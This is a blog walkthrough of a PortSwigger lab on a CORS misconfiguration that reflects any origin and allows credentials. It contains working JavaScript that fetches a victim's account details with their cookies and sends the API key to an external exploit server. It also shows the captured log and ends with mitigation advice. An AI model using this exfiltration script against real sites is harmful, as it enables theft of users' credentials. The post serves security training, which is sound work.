DEV Community: ryangombe The latest articles on DEV Community by ryangombe (@ryangombe). https://dev.to/ryangombe https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3382218%2Ffffa9af7-cdd5-459e-9c9b-dd2f691ce820.png DEV Community: ryangombe https://dev.to/ryangombe en Solving the CORS Vulnerability Lab: Basic Origin Reflection ryangombe Wed, 23 Jul 2025 14:00:41 +0000 https://dev.to/ryangombe/solving-the-cors-vulnerability-lab-basic-origin-reflection-589c https://dev.to/ryangombe/solving-the-cors-vulnerability-lab-basic-origin-reflection-589c <h2> Introduction </h2> <p>Cross-Origin Resource Sharing (CORS) vulnerabilities represent a significant security risk when misconfigured. In this walkthrough, we'll explore PortSwigger's "CORS vulnerability with basic origin reflection" lab, demonstrating how improper CORS implementation can lead to sensitive data exposure.</p> <h2> Understanding CORS and the Vulnerability </h2> <h3> What is CORS? </h3> <p>CORS is a browser security mechanism that allows web pages to make requests to different domains than the one serving the page. It uses HTTP headers to tell browsers whether specific cross-origin requests should be allowed.</p> <h3> The Vulnerability </h3> <p>The target application has a critical CORS misconfiguration: it trusts all origins by reflecting any origin header back in the <code>Access-Control-Allow-Origin</code> response header, combined with <code>Access-Control-Allow-Credentials: true</code>. This combination allows any malicious website to make authenticated requests and read sensitive responses.</p> <h2> Lab Setup and Initial Analysis </h2> <p><strong>Lab Objective:</strong> Craft JavaScript that uses CORS to retrieve the administrator's API key and upload it to your exploit server.</p> <p><strong>Credentials:</strong> <code>wiener:peter</code></p> <h3> Step 1: Confirming the Vulnerability </h3> <p>After logging in with the provided credentials, I tested the CORS configuration by intercepting the request to <code>/accountDetails</code> and adding a custom <code>Origin</code> header:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">GET</span> <span class="nn">/accountDetails</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">2</span> <span class="na">Host</span><span class="p">:</span> <span class="s">0a16002b041df12c80c2039b00a40038.web-security-academy.net</span> <span class="na">Cookie</span><span class="p">:</span> <span class="s">session=lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO</span> <span class="na">Origin</span><span class="p">:</span> <span class="s">https://attacker.com</span> </code></pre> </div> <p>The server's response confirmed the vulnerability:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">2</span> <span class="m">200</span> <span class="ne">OK</span> <span class="na">Access-Control-Allow-Origin</span><span class="p">:</span> <span class="s">https://attacker.com</span> <span class="na">Access-Control-Allow-Credentials</span><span class="p">:</span> <span class="s">true</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json; charset=utf-8</span> <span class="p">{</span><span class="w"> </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"wiener"</span><span class="p">,</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"apikey"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AQqU5vW28FVytBfqUwmm6ip5EfOcGLbX"</span><span class="p">,</span><span class="w"> </span><span class="nl">"sessions"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Key Observations:</strong></p> <ul> <li>The <code>Origin</code> header is reflected exactly in <code>Access-Control-Allow-Origin</code> </li> <li> <code>Access-Control-Allow-Credentials: true</code> allows cookies to be included</li> <li>The response contains sensitive data including the API key</li> </ul> <h2> Crafting the Exploit </h2> <h3> Step 2: JavaScript Exploit Development </h3> <p>The exploit leverages the CORS misconfiguration to steal the administrator's API key:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// CORS exploit to retrieve administrator's API key</span> <span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">XMLHttpRequest</span><span class="p">();</span> <span class="nx">req</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Parse the response to extract the API key</span> <span class="kd">var</span> <span class="nx">response</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">apikey</span> <span class="o">=</span> <span class="nx">response</span><span class="p">.</span><span class="nx">apikey</span><span class="p">;</span> <span class="c1">// Send the API key to your exploit server</span> <span class="kd">var</span> <span class="nx">exfiltrate</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">XMLHttpRequest</span><span class="p">();</span> <span class="nx">exfiltrate</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/exploit?apikey=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">apikey</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">exfiltrate</span><span class="p">.</span><span class="nf">send</span><span class="p">();</span> <span class="p">};</span> <span class="c1">// Make CORS request to the vulnerable endpoint</span> <span class="nx">req</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">https://0a16002b041df12c80c2039b00a40038.web-security-academy.net/accountDetails</span><span class="dl">"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nx">withCredentials</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="c1">// Important: include cookies in the request</span> <span class="nx">req</span><span class="p">.</span><span class="nf">send</span><span class="p">();</span> </code></pre> </div> <p><strong>Exploit Breakdown:</strong></p> <ol> <li> <strong>XMLHttpRequest Creation:</strong> Creates a new request object</li> <li> <strong>Credential Inclusion:</strong> <code>withCredentials: true</code> ensures session cookies are sent</li> <li> <strong>Response Handling:</strong> Parses JSON response and extracts the API key</li> <li> <strong>Data Exfiltration:</strong> Sends the stolen API key to the attacker-controlled server</li> </ol> <h3> Step 3: Deploying the Exploit </h3> <ol> <li>Navigate to the exploit server: <code>https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/</code> </li> <li>Paste the JavaScript code into the body section (wrapped in <code>&lt;script&gt;</code> tags)</li> <li>Click "Store" to save the exploit payload</li> <li>Click "Deliver exploit to victim" to trigger the attack</li> <li>Click "Access server log"</li> <li>Check the request that was made by the victim to the exploit server that looks like this: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> 10.0.4.241 2025-07-23 08:49:53 +0000 "GET /exploit?apikey=i3NCPLRccl0ZXOKFX5Sb3ErmkkZkf6VR HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" </code></pre> </div> <ol> <li>Submit solution</li> </ol> <h2> Why This Attack Works </h2> <h3> Technical Analysis </h3> <p>The attack succeeds due to three critical factors:</p> <ol> <li> <strong>Origin Reflection:</strong> The server reflects any origin without validation</li> <li> <strong>Credential Support:</strong> <code>Access-Control-Allow-Credentials: true</code> allows authenticated requests </li> <li> <strong>Sensitive Data Exposure:</strong> The endpoint returns sensitive information in the response</li> </ol> <p>When the administrator visits the malicious page:</p> <ol> <li>Their browser executes the malicious JavaScript</li> <li>The script makes a CORS request to <code>/accountDetails</code> with the admin's session cookies</li> <li>The server processes the request as if it came from the admin</li> <li>The response containing the API key is readable by the malicious script</li> <li>The API key is exfiltrated to the attacker's server</li> </ol> <h2> Prevention and Mitigation </h2> <h3> Secure CORS Configuration </h3> <p>To prevent this vulnerability:</p> <ol> <li> <strong>Whitelist Specific Origins:</strong> Only allow trusted domains </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> Access-Control-Allow-Origin: https://trusted-domain.com </code></pre> </div> <ol> <li><p><strong>Avoid Wildcards with Credentials:</strong> Never combine <code>*</code> with <code>Access-Control-Allow-Credentials: true</code></p></li> <li><p><strong>Validate Origins Properly:</strong> Implement server-side origin validation<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code> <span class="kd">const</span> <span class="nx">allowedOrigins</span> <span class="o">=</span> <span class="p">[</span><span class="dl">'</span><span class="s1">https://app.company.com</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">https://admin.company.com</span><span class="dl">'</span><span class="p">];</span> <span class="k">if </span><span class="p">(</span><span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nx">origin</span><span class="p">))</span> <span class="p">{</span> <span class="nx">response</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Access-Control-Allow-Origin</span><span class="dl">'</span><span class="p">,</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">.</span><span class="nx">origin</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <ol> <li> <strong>Minimize Credential Exposure:</strong> Only set <code>Access-Control-Allow-Credentials: true</code> when absolutely necessary</li> </ol> <h2> Conclusion </h2> <p>This lab demonstrates how a simple CORS misconfiguration can lead to complete compromise of user data. The combination of origin reflection and credential support creates a perfect storm for cross-origin attacks. Security practitioners should regularly audit CORS configurations and implement strict origin validation to prevent such vulnerabilities.</p> <p><strong>Key Takeaways:</strong></p> <ul> <li>CORS misconfigurations can be as dangerous as traditional XSS vulnerabilities</li> <li>Proper origin validation is critical for secure CORS implementation</li> <li>Never trust user-supplied origin headers without validation</li> <li>Regular security testing should include CORS configuration reviews</li> </ul> <p>Understanding and preventing CORS vulnerabilities is essential for modern web application security, as APIs and cross-origin communications become increasingly prevalent in web development.</p>